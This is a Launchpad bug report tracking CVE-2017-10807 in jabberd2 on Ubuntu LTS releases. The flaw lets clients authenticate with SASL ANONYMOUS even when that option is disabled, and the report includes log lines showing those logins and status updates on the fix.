jabberd2 before 2.6.1 allows anyone to authenticate using SASL ANONYMOUS, even when the sasl.anonymous c2s.xml option is not enabled
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
Jabberd |
Incomplete
|
Undecided
|
Unassigned | ||
Debian |
Fix Released
|
Unknown
|
|||
jabberd2 (Ubuntu) |
Fix Released
|
Undecided
|
Unassigned | ||
Trusty |
New
|
Undecided
|
Unassigned | ||
Xenial |
New
|
Undecided
|
Unassigned |
Bug Description
Xenial 16.04.3 LTS ships with jabberd2 version 2.3.4-1ubuntu2 (as of this report). This version is vulnerable to CVE-2017-10807, namely it allows "anonymous" SASL authentication even when that option is switched off in the configuration:
```
Feb 06 13:34:24 dehost jabberd/c2s[2662]: [68] ANONYMOUS authentication succeeded: <email address hidden> ::ffff:
Feb 06 13:34:29 dehost jabberd/c2s[2662]: [69] ANONYMOUS authentication succeeded: <email address hidden> ::ffff:
Feb 06 13:34:30 dehost jabberd/c2s[2662]: [76] ANONYMOUS authentication succeeded: <email address hidden> ::ffff:
Feb 06 13:34:35 dehost jabberd/c2s[2662]: [71] ANONYMOUS authentication succeeded: <email address hidden> ::ffff:
```
There is Debian bug #867032 for this vulnerability.
Current upstream versions of jabberd2 are not vulnerable; in particular version 2.6.1-1 that ships with artful is _probably_ not vulnerable, so this report only applies to the LTS release.
Apparently fixed by this upstream commit: https:/
CVE References
information type: | Private Security → Public Security |
description: | updated |
Changed in debian: | |
status: | Unknown → Fix Released |
Thanks for taking the time to report this bug and helping to make Ubuntu better. Since the package referred to in this bug is in universe or multiverse, it is community maintained. If you are able, I suggest coordinating with upstream and posting a debdiff for this issue. When a debdiff is available, members of the security team will review it and publish the package. See the following link for more information: https:/ /wiki.ubuntu. com/SecurityTea m/UpdateProcedu res